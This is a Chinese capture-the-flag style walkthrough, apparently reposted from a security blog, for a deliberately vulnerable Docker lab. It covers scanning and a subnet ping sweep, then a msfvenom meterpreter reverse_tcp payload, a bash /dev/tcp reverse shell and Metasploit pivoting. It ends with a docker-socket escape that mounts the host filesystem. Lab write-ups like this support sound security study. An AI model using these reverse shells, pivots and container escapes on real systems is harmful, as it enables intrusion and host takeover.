vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

admin 2025年6月15日23:26:21评论6 views字数 2245阅读7分29秒阅读模式

一、信息收集

1、主机发现

arp-scan -lvulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

2、端口扫描

nmap -sS -sV 192.168.66.146 nmap -p- -Pn -sC -sV -n 192.168.66.146 whatweb -v 192.168.66.146

22/tcp   open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 

8000/tcp open  http    Apache httpd 2.4.10 ((Debian))

ok,这里扫出来两个端口,一个8000端口一个22端口,我们先看看8000端口有什么东西

3、目录扫描,指纹识别

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。这个hard难度我打开的时候就已经有之前的缓存了,那我们直接连接shell即可

4、gitshell,内网信息收集

内网收集vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。ok,这里找到了个ip,应该和上台靶机一样的 老规矩,探测一下内网存活i

for i in {1..254}; do (ping -c 1 172.18.0.${i} | grep "bytes from" | grep -v "Unreachable" &); done;
vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

5、代理搭建

这里直接使用msf模块

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.66.129 LPORT=9999 -f elf > hzy

使用MSF创建稳定shell

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。我们下载下来,然后kali上开一个监听

use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp 
msf6 exploit(multi/handler) > set lhost 192.168.66.129
msf6 exploit(multi/handler) > set lport 9999
msf6 exploit(multi/handler) > run

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。ok,这里拿到了不稳定的shell,接下来我们弹一条shell

添加路由,搭建代理


meterpreter > route

IPv4 network routes
===================

    Subnet      Netmask      Gateway     Metric  Interface
    ------      -------      -------     ------  ---------
    0.0.0.0     0.0.0.0      172.18.0.1  0       eth0
    172.18.0.0  255.255.0.0  0.0.0.0     0       eth0

No IPv6 routes were found.
meterpreter > run post/multi/manage/autoroute

[*] Running module against 172.18.0.2
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.18.0.0/255.255.0.0 from host's routing table.
meterpreter > run auturoute -p

[-] The specified meterpreter session script could not be found: auturoute
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   172.18.0.0         255.255.0.0        Session 1


6、内网扫描同网段主机

这里我们直接用net.sh脚本扫内网存活主机了

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。这里端口转发就要msf的了,比较方便vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。怪可爱的,msf的logo

portfwd add -l 8022 -p 8022 -r 172.18.0.4

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。转发成功,访问8022端口

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。ok,转发成功,这里反弹一个shell,因为这个是docker环境,不能做什么操作 bash -i >& /dev/tcp/192.168.66.129/7777 0>&1 这里出了点问题,就是我的kali端口转发后访问127.0.0.1:8022端口后的页面关闭了之后就再也无法访问了,这里就借鉴其他师傅的wp了。vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。卡在这个页面再也不动了,有知道的师傅可以评论

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。
apt update
apt install python docker wget
如果docker无法安装成功,可以通过在其他主机上复制docker二进制文件,并下载到容器中

7.使用Python创建虚拟终端

python -c 'import pty; pty.spawn("/bin/bash")' ./docker run -it -v /:/host ubuntu bash cd /host

8.获取flag

vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

这个好像和easy难度没什么区别,如果前面步骤有不懂的可以参考easy难度,哪个写的更完整

原文始发于微信公众号(泷羽Sec-朝阳):vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月15日23:26:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。http://cn-sec.com/archives/4167903.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息